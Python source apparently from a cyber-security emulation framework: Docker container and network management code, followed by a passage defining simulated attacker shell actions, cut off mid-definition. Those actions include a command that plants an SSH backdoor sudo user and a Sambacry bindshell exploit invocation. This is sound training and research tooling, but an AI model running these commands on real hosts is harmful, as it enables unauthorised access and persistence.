import csle_collector.docker_stats_manager.docker_stats_manager_pb2_grpc
import csle_collector.docker_stats_manager.docker_stats_manager_pb2
import csle_collector.docker_stats_manager.query_docker_stats_manager
import csle_collector.docker_stats_manager.docker_stats_util
from csle_common.util.docker_util import DockerUtil
from csle_common.dao.emulation_config.emulation_env_config import EmulationEnvConfig
from csle_common.dao.emulation_config.containers_config import ContainersConfig
from csle_common.dao.emulation_config.container_network import ContainerNetwork
from csle_common.dao.emulation_config.docker_stats_manager_config import DockerStatsManagerConfig
import csle_common.constants.constants as constants
from csle_common.logging.log import Logger
from csle_common.dao.emulation_config.emulation_execution import EmulationExecution
from csle_common.dao.emulation_config.docker_stats_managers_info import DockerStatsManagersInfo
from csle_common.dao.emulation_config.node_container_config import NodeContainerConfig
from csle_common.controllers.management_system_controller import ManagementSystemController
from csle_common.dao.emulation_config.config import Config
from csle_common.util.general_util import GeneralUtil


class ContainerController:
    """
    A class for managing Docker containers and virtual networks
    """

    @staticmethod
    def stop_all_running_containers() -> None:
        """
        Utility function for stopping all running containers

        :return: None
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list()
        containers = list(filter(lambda x: constants.CSLE.NAME in x.name, containers))
        for c in containers:
            Logger.__call__().get_logger().info(f"Stopping container: {c.name}")
            c.stop()

    @staticmethod
    def stop_container(name: str) -> bool:
        """
        Utility function for stopping a specific container

        :param name: the name of the container to stop
        :return: True if stopped, False otherwise
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list()
        containers = list(filter(lambda x: constants.CSLE.NAME in x.name, containers))
        for c in containers:
            if c.name == name:
                c.stop()
                return True
        return False

    @staticmethod
    def rm_all_stopped_containers() -> None:
        """
        A utility function for removing all stopped containers

        :return: None
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list(all=True)
        containers = list(filter(lambda x: (constants.CSLE.NAME in x.name
                                            and x.status == constants.DOCKER.CONTAINER_EXIT_STATUS
                                            or x.status == constants.DOCKER.CONTAINER_CREATED_STATUS), containers))
        for c in containers:
            Logger.__call__().get_logger().info(f"Removing container: {c.name}")
            c.remove()

    @staticmethod
    def rm_container(container_name: str) -> bool:
        """
        Remove a specific container

        :param container_name: the container to remove
        :return: True if the container was removed and False otherwise
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list(all=True)
        for c in containers:
            if c.name == container_name:
                c.remove()
                return True
        return False

    @staticmethod
    def rm_all_images() -> None:
        """
        A utility function for removing all csle images

        :return: None
        """
        client_1 = docker.from_env()
        images = client_1.images.list()
        images = list(filter(lambda x: constants.CSLE.NAME in ",".join(x.attrs[constants.DOCKER.REPO_TAGS]), images))
        non_base_images = list(
            filter(lambda x: (constants.DOCKER.BASE_CONTAINER_TYPE
                              not in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), images))
        base_images = list(filter(lambda x: (constants.DOCKER.BASE_CONTAINER_TYPE
                                             in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), images))
        non_os_base_images = list(filter(
            lambda x: not (constants.OS.UBUNTU in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])
                           or constants.OS.KALI in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), base_images))
        os_base_images = list(filter(lambda x: (constants.OS.UBUNTU in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])
                                                or constants.OS.KALI in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])),
                                     base_images))
        for img in non_base_images:
            Logger.__call__().get_logger().info("Removing image: {}".format(img.attrs[constants.DOCKER.REPO_TAGS]))
            client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)
        for img in non_os_base_images:
            Logger.__call__().get_logger().info("Removing image: {}".format(img.attrs[constants.DOCKER.REPO_TAGS]))
            client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)
        for img in os_base_images:
            Logger.__call__().get_logger().info("Removing image: {}".format(img.attrs[constants.DOCKER.REPO_TAGS]))
            client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)

    @staticmethod
    def rm_image(name) -> bool:
        """
        A utility function for removing a specific image

        :param name: the name of the image to remove
        :return: True if the image was removed and False otherwise
        """
        client_1 = docker.from_env()
        images = client_1.images.list()
        images = list(filter(lambda x: constants.CSLE.NAME in ",".join(x.attrs[constants.DOCKER.REPO_TAGS]), images))
        non_base_images = list(filter(
            lambda x: (constants.DOCKER.BASE_CONTAINER_TYPE not in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])),
            images))
        base_images = list(filter(lambda x: (constants.DOCKER.BASE_CONTAINER_TYPE
                                             in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), images))
        non_os_base_images = list(
            filter(lambda x: not (constants.OS.UBUNTU in ",".join(x.attrs[constants.DOCKER.REPO_TAGS]) or
                                  constants.OS.KALI in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), base_images))
        os_base_images = list(
            filter(lambda x: (constants.OS.UBUNTU in ",".join(x.attrs[constants.DOCKER.REPO_TAGS]) or constants.OS.KALI
                              in ",".join(x.attrs[constants.DOCKER.REPO_TAGS])), base_images))
        for img in non_base_images:
            if img.attrs[constants.DOCKER.REPO_TAGS][0] == name:
                client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)
                return True
        for img in non_os_base_images:
            if img.attrs[constants.DOCKER.REPO_TAGS][0] == name:
                client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)
                return True
        for img in os_base_images:
            if img.attrs[constants.DOCKER.REPO_TAGS][0] == name:
                client_1.images.remove(image=img.attrs[constants.DOCKER.REPO_TAGS][0], force=True)
                return True

        return False

    @staticmethod
    def list_all_images() -> List[Tuple[str, str, str, str, int]]:
        """
        A utility function for listing all csle images

        :return: a list of the csle images
        """
        client_1 = docker.from_env()
        images = client_1.images.list()
        images = list(filter(lambda x: constants.CSLE.NAME in ",".join(x.attrs[constants.DOCKER.REPO_TAGS]), images))
        images_names_created_os_architecture_size = list(
            map(lambda x: (x.attrs[constants.DOCKER.REPO_TAGS][0],
                           x.attrs[constants.DOCKER.IMAGE_CREATED], x.attrs[constants.DOCKER.IMAGE_OS],
                           x.attrs[constants.DOCKER.IMAGE_ARCHITECTURE], x.attrs[constants.DOCKER.IMAGE_SIZE]), images))
        return images_names_created_os_architecture_size

    @staticmethod
    def list_docker_networks() -> Tuple[List[str], List[int]]:
        """
        Lists the csle docker networks

        :return: (network names, network ids)
        """
        cmd = constants.DOCKER.LIST_NETWORKS_CMD
        stream = os.popen(cmd)
        networks_str: str = stream.read()
        networks: List[str] = networks_str.split("\n")

        networks_list: List[List[str]] = list(map(lambda x: x.split(), networks))
        networks_list = list(filter(lambda x: len(x) > 1, networks_list))
        networks_ids_str: List[str] = list(map(lambda x: x[1], networks_list))

        networks_ids_str = list(filter(lambda x: re.match(
            r"{}\d".format(constants.CSLE.CSLE_NETWORK_PREFIX), x), networks_ids_str))
        network_ids: List[int] = list(map(lambda x: int(x.replace(constants.CSLE.CSLE_NETWORK_PREFIX, "")),
                                          networks_ids_str))
        return networks_ids_str, network_ids

    @staticmethod
    def list_all_networks() -> List[str]:
        """
        A utility function for listing all csle networks

        :return: a list of the networks
        """
        networks, network_ids = ContainerController.list_docker_networks()
        return networks

    @staticmethod
    def start_all_stopped_containers() -> None:
        """
        Starts all stopped csle containers

        :return: None
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list(all=True)
        containers = list(filter(lambda x: (constants.CSLE.NAME in x.name
                                            and x.status == constants.DOCKER.CONTAINER_EXIT_STATUS
                                            or x.status == constants.DOCKER.CONTAINER_CREATED_STATUS), containers))
        for c in containers:
            Logger.__call__().get_logger().info("Starting container: {}".format(c.name))
            c.start()

    @staticmethod
    def start_container(name: str) -> bool:
        """
        Starts a stopped container with a specific name

        :param name: the name of the stopped container to start
        :return: True if started, False otherrwise
        """
        client_1 = docker.from_env()
        containers = client_1.containers.list(all=True)
        containers = list(filter(lambda x: (constants.CSLE.NAME in x.name
                                            and x.status == constants.DOCKER.CONTAINER_EXIT_STATUS
                                            or x.status == constants.DOCKER.CONTAINER_CREATED_STATUS), containers))
        for c in containers:
            if c.name == name:
                c.start()
                return True
        return False

    @staticmethod
    def list_all_running_containers() -> List[Tuple[str, str, str]]:
        """
        Lists all running csle containers

        :return: a list of the names of the running containers
        """
        parsed_envs = DockerUtil.parse_runnning_emulation_infos()
        container_name_image_ip: List[Tuple[str, str, str]] = []
        for env in parsed_envs:
            container_name_image_ip = (container_name_image_ip +
                                       list(map(lambda x: (x.name, x.image_name, x.ip), env.containers)))
        return container_name_image_ip

    @staticmethod
    def list_all_running_containers_in_emulation(emulation_env_config: EmulationEnvConfig) \
            -> Tuple[List[NodeContainerConfig], List[NodeContainerConfig]]:
        """
        Extracts the running containers and the stopped containers of a given emulation

        :param emulation_env_config: the emulation configuration
        :return: the list of running containers and the list of stopped containers
        """
        running_emulation_containers = []
        stopped_emulation_containers = []
        running_containers = ContainerController.list_all_running_containers()
        running_containers_names = list(map(lambda x: x[0], running_containers))
        for c in emulation_env_config.containers_config.containers:
            if c.full_name_str in running_containers_names:
                running_emulation_containers.append(c)
            else:
                stopped_emulation_containers.append(c)
        if emulation_env_config.kafka_config.container.full_name_str in running_containers_names:
            running_emulation_containers.append(emulation_env_config.kafka_config.container)
        else:
            stopped_emulation_containers.append(emulation_env_config.kafka_config.container)

        if emulation_env_config.elk_config.container.full_name_str in running_containers_names:
            running_emulation_containers.append(emulation_env_config.elk_config.container)
        else:
            stopped_emulation_containers.append(emulation_env_config.elk_config.container)

        if emulation_env_config.sdn_controller_config is not None:
            if emulation_env_config.sdn_controller_config.container.full_name_str in running_containers_names:

                running_emulation_containers.append(emulation_env_config.sdn_controller_config.container)
            else:
                stopped_emulation_containers.append(emulation_env_config.sdn_controller_config.container)
        return running_emulation_containers, stopped_emulation_containers

    @staticmethod
    def list_all_active_networks_for_emulation(emulation_env_config: EmulationEnvConfig) \
            -> Tuple[List[ContainerNetwork], List[ContainerNetwork]]:
        """
        Extracts the active networks of a given emulation

        :param emulation_env_config: the emulation configuration
        :return: the list of active networks and inactive networks of an emulation
        """
        active_emulation_networks = []
        inactive_emulation_networks = []
        active_networks_names = ContainerController.list_all_networks()
        for net in emulation_env_config.containers_config.networks:
            if net.name in active_networks_names:
                active_emulation_networks.append(net)
            else:
                inactive_emulation_networks.append(net)
        return active_emulation_networks, inactive_emulation_networks

    @staticmethod
    def is_emulation_running(emulation_env_config: EmulationEnvConfig) -> bool:
        """
        Checks if a given emulation config is running or not

        :param emulation_env_config: the emulation environment configuration
        :return: True if running otherwise False
        """
        running_emulations = ContainerController.list_running_emulations()
        return emulation_env_config.name in running_emulations

    @staticmethod
    def list_running_emulations() -> List[str]:
        """
        :return: A list of names of running emulations
        """
        parsed_envs = DockerUtil.parse_runnning_emulation_infos()
        emulation_names = set()
        for env in parsed_envs:
            emulation_names.add(env.name)
        return list(emulation_names)

    @staticmethod
    def list_all_stopped_containers() -> List[Tuple[str, str, str]]:
        """
        Lists all stopped csle containers

        :return: a list of the stopped containers
        """
        client_1 = docker.from_env()
        client2 = docker.APIClient(base_url=constants.DOCKER.UNIX_DOCKER_SOCK_URL)
        parsed_stopped_containers = DockerUtil.parse_stopped_containers(client_1=client_1, client2=client2)
        container_name_image_ips = list(map(lambda x: (x.name, x.image_name, x.ip), parsed_stopped_containers))
        return container_name_image_ips

    @staticmethod
    def get_network_references():
        """
        :return: a list of Docker network references
        """
        client_1 = docker.from_env()
        networks = client_1.networks.list()
        return networks

    @staticmethod
    def create_networks(containers_config: ContainersConfig, logger: logging.Logger) -> None:
        """
        Creates docker networks for a given containers configuration

        :param logger: the logger to use for logging
        :param containers_config: the containers configuration
        :return: None
        """
        for c in containers_config.containers:
            for ip_net in c.ips_and_networks:
                existing_networks = ContainerController.get_network_references()
                existing_networks = list(map(lambda x: x.name, existing_networks))
                ip, net = ip_net
                if net.name != "":
                    ContainerController.create_network_from_dto(network_dto=net,
                                                                existing_network_names=existing_networks,
                                                                logger=logger)

    @staticmethod
    def connect_containers_to_networks(emulation_env_config: EmulationEnvConfig, physical_server_ip: str,
                                       logger: logging.Logger) -> None:
        """
        Connects running containers to networks

        :param emulation_env_config: the emulation config
        :param physical_server_ip: the ip of the physical server where the operation is executed
        :param logger: the logger to use for logging
        :return: None
        """
        for c in emulation_env_config.containers_config.containers:
            if c.physical_host_ip != physical_server_ip:
                continue
            container_name = c.get_full_name()
            # Disconnect from none
            cmd = f"docker network disconnect none {container_name}"
            subprocess.Popen(cmd, stdout=subprocess.DEVNULL, shell=True)

            # Wait a few seconds before connecting
            time.sleep(2)

            for ip_net in c.ips_and_networks:
                time.sleep(2)
                ip, net = ip_net
                cmd = f"{constants.DOCKER.NETWORK_CONNECT} --ip {ip} {net.name} " \
                      f"{container_name}"
                logger.info(f"Connecting container:{container_name} to network:{net.name} with ip: {ip}, cmd: {cmd}")
                subprocess.Popen(cmd, stdout=subprocess.DEVNULL, shell=True)

                if c.docker_gw_bridge_ip == "" or c.docker_gw_bridge_ip is None:
                    # Wait to make sure docker networks are updated
                    time.sleep(2)
                    # Extract the docker bridge gateway IP
                    container_id = DockerUtil.get_container_hex_id(name=container_name)
                    if container_id is None:
                        raise ValueError(f"Could not parse the container id with container name: {container_name}")
                    docker_gw_bridge_ip = DockerUtil.get_docker_gw_bridge_ip(container_id=container_id)
                    c.docker_gw_bridge_ip = docker_gw_bridge_ip

        if emulation_env_config.kafka_config.container.physical_host_ip == physical_server_ip:
            ContainerController.connect_container_to_network(container=emulation_env_config.kafka_config.container,
                                                             logger=logger)
        if emulation_env_config.elk_config.container.physical_host_ip == physical_server_ip:
            ContainerController.connect_container_to_network(container=emulation_env_config.elk_config.container,
                                                             logger=logger)
        if emulation_env_config.sdn_controller_config is not None and \
                emulation_env_config.sdn_controller_config.container.physical_host_ip == physical_server_ip:
            # Connect controller
            ContainerController.connect_container_to_network(
                container=emulation_env_config.sdn_controller_config.container, logger=logger)
            # Update IPs of OVS switches
            for ovs_sw in emulation_env_config.ovs_config.switch_configs:
                node_container_config = emulation_env_config.containers_config.get_container_from_ip(ovs_sw.ip)
                if node_container_config is None:
                    raise ValueError(f"Could not find node container config for IP: {ovs_sw.ip}")
                ovs_sw.docker_gw_bridge_ip = node_container_config.docker_gw_bridge_ip

    @staticmethod
    def connect_container_to_network(container: NodeContainerConfig, logger: logging.Logger) -> None:
        """
        Connect a running container to networks

        :param container: the container to connect
        :param logger: the logger to use for logging
        :return: None
        """
        container_name = container.get_full_name()
        # Disconnect from none
        cmd = f"docker network disconnect none {container_name}"
        subprocess.Popen(cmd, stdout=subprocess.DEVNULL, shell=True)

        # Wait a few seconds before connecting
        time.sleep(2)

        for ip_net in container.ips_and_networks:
            time.sleep(2)
            ip, net = ip_net
            cmd = f"{constants.DOCKER.NETWORK_CONNECT} --ip {ip} {net.name} " \
                  f"{container_name}"
            logger.info(f"Connecting container:{container_name} to network:{net.name} with ip: {ip}, cmd: {cmd}")
            subprocess.Popen(cmd, stdout=subprocess.DEVNULL, shell=True)
            if container.docker_gw_bridge_ip == "" or container.docker_gw_bridge_ip is None:
                # Wait to make sure docker networks are updated
                time.sleep(2)
                # Extract the docker bridge gateway IP
                container_id = DockerUtil.get_container_hex_id(name=container_name)
                if container_id is None:
                    raise ValueError(f"Could not parse the container id for container name: {container_name}")
                docker_gw_bridge_ip = DockerUtil.get_docker_gw_bridge_ip(container_id=container_id)
                container.docker_gw_bridge_ip = docker_gw_bridge_ip

    @staticmethod
    def start_docker_stats_thread(execution: EmulationExecution, physical_server_ip: str,
                                  logger: logging.Logger) -> None:
        """
        Sends a request to the docker stats manager on the docker host for starting a docker stats monitor thread

        :param execution: the emulation execution
        :param physical_server_ip: the ip of the physical server
        :param logger: the logger to use for logging
        :return: None
        """
        if not ManagementSystemController.is_statsmanager_running():
            ManagementSystemController.start_docker_statsmanager(
                logger=logger,
                port=execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_port,
                log_dir=execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_log_dir,
                log_file=execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_log_file,
                max_workers=execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_max_workers
            )
            time.sleep(5)
        ip = physical_server_ip
        logger.info(
            f"connecting to: {ip}:"
            f"{execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_port}")
        with grpc.insecure_channel(
                f'{ip}:'
                f'{execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_port}',
                options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
            stub = csle_collector.docker_stats_manager.docker_stats_manager_pb2_grpc.DockerStatsManagerStub(channel)
            container_ip_dtos = []
            for c in execution.emulation_env_config.containers_config.containers:
                if c.physical_host_ip == physical_server_ip:
                    name = c.get_full_name()
                    ip = c.get_ips()[0]
                    container_ip_dtos.append(csle_collector.docker_stats_manager.docker_stats_manager_pb2.ContainerIp(
                        ip=ip, container=name))
            logger.info("connected")

            csle_collector.docker_stats_manager.query_docker_stats_manager.start_docker_stats_monitor(
                stub=stub, emulation=execution.emulation_name,
                kafka_ip=execution.emulation_env_config.kafka_config.container.docker_gw_bridge_ip,
                stats_queue_maxsize=1000,
                time_step_len_seconds=execution.emulation_env_config.docker_stats_manager_config.time_step_len_seconds,
                kafka_port=execution.emulation_env_config.kafka_config.kafka_port_external,
                containers=container_ip_dtos, execution_first_ip_octet=execution.ip_first_octet)

    @staticmethod
    def stop_docker_stats_thread(execution: EmulationExecution, physical_server_ip: str,
                                 logger: logging.Logger) -> None:
        """
        Sends a request to the docker stats manager on the docker host for stopping a docker stats monitor thread

        :param logger: the logger to use for logging
        :param execution: the execution of the emulation for which the monitor should be stopped
        :param physical_server_ip: the ip of the physical server
        :return: None
        """
        if not ManagementSystemController.is_statsmanager_running():
            ManagementSystemController.stop_docker_statsmanager(logger=logger)
            time.sleep(5)
        ip = physical_server_ip
        with grpc.insecure_channel(
                f'{ip}:'
                f'{execution.emulation_env_config.docker_stats_manager_config.docker_stats_manager_port}',
                options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
            stub = csle_collector.docker_stats_manager.docker_stats_manager_pb2_grpc.DockerStatsManagerStub(channel)
            csle_collector.docker_stats_manager.query_docker_stats_manager.stop_docker_stats_monitor(
                stub=stub, emulation=execution.emulation_name, execution_first_ip_octet=execution.ip_first_octet)

    @staticmethod
    def get_docker_stats_manager_status(docker_stats_manager_config: DockerStatsManagerConfig) \
            -> csle_collector.docker_stats_manager.docker_stats_manager_pb2.DockerStatsMonitorDTO:
        """
        Sends a request to get the status of the docker stats manager

        :param docker_stats_manager_config: the docker stats manager configuration
        :return: None
        """
        ip = GeneralUtil.get_host_ip()
        docker_stats_monitor_dto = ContainerController.get_docker_stats_manager_status_by_ip_and_port(
            ip=ip, port=docker_stats_manager_config.docker_stats_manager_port)
        return docker_stats_monitor_dto

    @staticmethod
    def get_docker_stats_manager_status_by_ip_and_port(ip: str, port: int) \
            -> csle_collector.docker_stats_manager.docker_stats_manager_pb2.DockerStatsMonitorDTO:
        """
        Sends a request to get the status of the docker stats manager

        :param ip: ip of the host where the stats manager is running
        :param port: port that the host manager is listening to
        :return: None
        """
        try:
            with grpc.insecure_channel(f'{ip}:{port}', options=constants.GRPC_SERVERS.GRPC_OPTIONS) as channel:
                stub = csle_collector.docker_stats_manager.docker_stats_manager_pb2_grpc.DockerStatsManagerStub(channel)

                docker_stats_monitor_dto = \
                    csle_collector.docker_stats_manager.query_docker_stats_manager.get_docker_stats_manager_status(
                        stub=stub)
                return docker_stats_monitor_dto
        except Exception:
            return None

    @staticmethod
    def create_network_from_dto(network_dto: ContainerNetwork, logger: logging.Logger,
                                existing_network_names=None) -> None:
        """
        Creates a network from a given DTO representing the network

        :param network_dto: details of the network to create
        :param existing_network_names: list of network names, if not None, check if network exists befeore creating
        :param logger: the logger to use for logging
        :return: None
        """
        config = Config.get_current_config()
        if config is None:
            raise ValueError("Could not parse the CSLE config")
        driver = constants.DOCKER.BRIDGE_NETWORK_DRIVER
        if len(config.cluster_config.cluster_nodes) > 0:
            driver = constants.DOCKER.OVERLAY_NETWORK_DRIVER
        ContainerController.create_network(name=network_dto.name, subnetmask=network_dto.subnet_mask,
                                           existing_network_names=existing_network_names, driver=driver,
                                           logger=logger)

    @staticmethod
    def create_network(name: str, subnetmask: str, logger: logging.Logger,
                       driver: str = "bridge", existing_network_names: Union[None, List[str]] = None) -> None:
        """
        Creates a network

        :param name: the name of the network to create
        :param subnetmask: the subnetmask of the network to create
        :param logger: the logger to use for logging
        :param driver: the driver of the network to create
        :param existing_network_names: list of network names, if not None, check if network exists befeore creating
        :return: None
        """
        client_1 = docker.from_env()
        ipam_pool = docker.types.IPAMPool(subnet=subnetmask)
        ipam_config = docker.types.IPAMConfig(pool_configs=[ipam_pool])
        network_names = []
        if existing_network_names is not None:
            network_names = existing_network_names
        if name not in network_names:
            logger.info(f"Creating network: {name}, subnetmask: {subnetmask}, driver: {driver}")
            client_1.networks.create(
                name,
                driver=driver,
                ipam=ipam_config,
                attachable=True
            )

    @staticmethod
    def remove_network(name: str, logger: logging.Logger) -> None:
        """
        Removes a network

        :param name: the name of the network to remove
        :param logger: the logger to use for logging
        :return: None
        """
        client_1 = docker.from_env()
        networks = client_1.networks.list()
        for net in networks:
            if net.name == name:
                logger.info(f"Removing network: {net.name}")
                try:
                    net.remove()
                except Exception:
                    pass

    @staticmethod
    def remove_networks(names: List[str], logger: logging.Logger) -> bool:
        """
        Removes a network

        :param name: the name of the network to remove
        :param logger: the logger to use for logging
        :return: True if at least one of the networks were successfully removed
        """
        client_1 = docker.from_env()
        networks = client_1.networks.list()
        network_removed = False
        for net in networks:
            if net.name in names:
                logger.info(f"Removing network: {net.name}")
                try:
                    net.remove()
                    network_removed = True
                except Exception:
                    pass
        return network_removed

    @staticmethod
    def rm_all_networks(logger: logging.Logger) -> None:
        """
        A utility function for removing all csle networks

        :param logger: the logger to use for logging
        :return: None
        """
        client_1 = docker.from_env()
        networks = client_1.networks.list()
        networks = list(filter(lambda x: constants.CSLE.NAME in x.name, networks))
        for net in networks:
            logger.info(f"Removing network:{net.name}")
            ContainerController.remove_network(name=net.name, logger=logger)

    @staticmethod
    def rm_network(name, logger: logging.Logger) -> bool:
        """
        A utility function for removing a network with a specific name

        :param name: the name of the network to remove
        :param logger: the logger to use for logging
        :return: True if it was removed or False otherwise
        """
        client_1 = docker.from_env()
        networks = client_1.networks.list()
        networks_names = []
        for net in networks:
            if constants.CSLE.NAME in net.name:
                net.name = constants.CSLE.NAME
                networks_names.append(net)
        networks = list(filter(lambda x: constants.CSLE.NAME in x.name, networks))
        for net in networks_names:
            if net.name == name:
                ContainerController.remove_network(name=net.name, logger=logger)
                return True
        return False

    @staticmethod
    def run_command(cmd: str) -> None:
        """
        Runs a container management command

        :param cmd: the command to run
        :return: None
        """
        if cmd == constants.MANAGEMENT.LIST_STOPPED:
            stopped_container_names = ContainerController.list_all_stopped_containers()
            Logger.__call__().get_logger().info(stopped_container_names)
        elif cmd == constants.MANAGEMENT.LIST_RUNNING:
            running_container_names = ContainerController.list_all_running_containers()
            Logger.__call__().get_logger().info(running_container_names)
        elif cmd == constants.MANAGEMENT.LIST_IMAGES:
            images_names = ContainerController.list_all_images()
            Logger.__call__().get_logger().info(images_names)
        elif cmd == constants.MANAGEMENT.STOP_RUNNING:
            ContainerController.stop_all_running_containers()
        elif cmd == constants.MANAGEMENT.RM_STOPPED:
            ContainerController.rm_all_stopped_containers()
        elif cmd == constants.MANAGEMENT.RM_IMAGES:
            ContainerController.rm_all_images()
        elif cmd == constants.MANAGEMENT.START_STOPPED:
            ContainerController.start_all_stopped_containers()
        elif cmd == constants.MANAGEMENT.LIST_NETWORKS:
            networks = ContainerController.list_all_networks()
            Logger.__call__().get_logger().info(networks)
        elif cmd == constants.MANAGEMENT.RM_NETWORKS:
            ContainerController.rm_all_networks(logger=Logger.__call__().get_logger())
        else:
            raise ValueError("Command: {} not recognized".format(cmd))

    @staticmethod
    def get_docker_stats_managers_ips(emulation_env_config: EmulationEnvConfig) -> List[str]:
        """
        A method that extracts the IPS of the Docker stats managers in a given emulation

        :param emulation_env_config: the emulation env config
        :return: the list of IP addresses
        """
        return [GeneralUtil.get_host_ip()]

    @staticmethod
    def get_docker_stats_managers_ports(emulation_env_config: EmulationEnvConfig) -> List[int]:
        """
        A method that extracts the ports of the Docker stats managers in a given emulation

        :param emulation_env_config: the emulation env config
        :return: the list of ports
        """
        return [emulation_env_config.docker_stats_manager_config.docker_stats_manager_port]

    @staticmethod
    def get_docker_stats_managers_info(emulation_env_config: EmulationEnvConfig, active_ips: List[str],
                                       physical_host_ip: str, logger: logging.Logger) \
            -> DockerStatsManagersInfo:
        """
        Extracts the information of the Docker stats managers for a given emulation

        :param emulation_env_config: the configuration of the emulation
        :param active_ips: list of active IPs
        :param physical_host_ip: the ip of the physical host
        :param logger: the logger to use for logging
        :return: a DTO with the status of the Docker stats managers
        """
        docker_stats_managers_ips = ContainerController.get_docker_stats_managers_ips(
            emulation_env_config=emulation_env_config)
        docker_stats_managers_ports = ContainerController.get_docker_stats_managers_ports(
            emulation_env_config=emulation_env_config)
        docker_stats_managers_statuses = []
        docker_stats_managers_running = []
        for ip in docker_stats_managers_ips:
            if ip not in active_ips or ip != physical_host_ip:
                continue
            running = False
            status = None
            try:
                status = ContainerController.get_docker_stats_manager_status_by_ip_and_port(
                    port=emulation_env_config.docker_stats_manager_config.docker_stats_manager_port, ip=ip)
                running = True
            except Exception as e:
                logger.debug(
                    f"Could not fetch Docker stats manager status on IP:{ip}, error: {str(e)}, {repr(e)}")
            if status is not None:
                docker_stats_managers_statuses.append(status)
            else:
                stats_util = csle_collector.docker_stats_manager.docker_stats_util.DockerStatsUtil
                docker_stats_managers_statuses.append(stats_util.docker_stats_monitor_dto_empty())
            docker_stats_managers_running.append(running)
        execution_id = emulation_env_config.execution_id
        emulation_name = emulation_env_config.name
        docker_stats_manager_info_dto = DockerStatsManagersInfo(
            docker_stats_managers_running=docker_stats_managers_running, ips=docker_stats_managers_ips,
            execution_id=execution_id, emulation_name=emulation_name,
            docker_stats_managers_statuses=docker_stats_managers_statuses, ports=docker_stats_managers_ports)
        return docker_stats_manager_info_dto



import csle_common.constants.constants as constants
from csle_common.dao.emulation_action.attacker.emulation_attacker_action import EmulationAttackerAction
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_type import EmulationAttackerActionType
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_id import EmulationAttackerActionId
from csle_common.dao.emulation_action.attacker.emulation_attacker_action_outcome import EmulationAttackerActionOutcome


class EmulationAttackerShellActions:
    """
    Class implementing regular Bash actions for the attacker (e.g. interacting with filesystem or OS) in the emulation
    """

    @staticmethod
    def FIND_FLAG(index: int) -> EmulationAttackerAction:
        """
        Searches through the file systems that have been compromised to find a flag

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.FIND_FLAG
        cmd = ["find / -name 'flag*.txt'  2>&1 | grep -v 'Permission denied'"]
        alt_cmd = ["find / | grep 'flag*'"]
        return EmulationAttackerAction(id=id, name="Find flag", cmds=cmd,
                                       type=EmulationAttackerActionType.POST_EXPLOIT,
                                       descr="Searches the file system for a flag",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.FLAG, alt_cmds=alt_cmd,
                                       backdoor=False)

    @staticmethod
    def INSTALL_TOOLS(index: int) -> EmulationAttackerAction:
        """
        Installs tools on compromised machines

        :param index: index of the machine to apply the action to
        :return: the created action
        """
        id = EmulationAttackerActionId.INSTALL_TOOLS
        cmd = ["sudo apt-get -y install nmap ssh git unzip lftp",
               "cd /;sudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip "
               "-O SecList.zip && sudo unzip -o SecList.zip && sudo rm -f SecList.zip && "
               "sudo mv SecLists-master /SecLists"]
        return EmulationAttackerAction(id=id, name="Install tools", cmds=cmd,
                                       type=EmulationAttackerActionType.POST_EXPLOIT,
                                       descr="If taken root on remote machine, installs pentest tools, e.g. nmap",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.PIVOTING, alt_cmds=None,
                                       backdoor=False)

    @staticmethod
    def SSH_BACKDOOR(index: int) -> EmulationAttackerAction:
        """
        Installs a SSH backdoor on a compromised machine

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.SSH_BACKDOOR
        cmd = ["sudo service ssh start", "sudo useradd -rm -d /home/{} -s /bin/bash -g root -G "
                                         "sudo -p \"$(openssl passwd -1 '{}')\" {}"]
        return EmulationAttackerAction(id=id, name="Install SSH backdoor", cmds=cmd,
                                       type=EmulationAttackerActionType.POST_EXPLOIT,
                                       descr="If taken root on remote machine, installs a ssh backdoor,"
                                             " useful for upgrading telnet"
                                             "or weaker channels",
                                       index=index,
                                       ips=[], action_outcome=EmulationAttackerActionOutcome.PIVOTING,
                                       alt_cmds=None,
                                       backdoor=True)

    @staticmethod
    def SAMBACRY_EXPLOIT(index: int) -> EmulationAttackerAction:
        """
        Launches the sambacry exploit

        :param index: index of the machine to apply the action to
        :return: the action
        """
        id = EmulationAttackerActionId.SAMBACRY_EXPLOIT
        cmd = ["sudo /root/miniconda3/envs/samba/bin/python /samba_exploit.py -e /libbindshell-samba.so -s data "
               "-r /data/libbindshell-samba.so -u sambacry -p nosambanocry -P 6699 -t {}"]
        return EmulationAttackerAction(id=id, name="Sambacry Explolit", cmds=cmd,
                                       type=EmulationAttackerActionType.EXPLOIT,
                                       descr="Uses the sambacry shell to get remote code execution and "
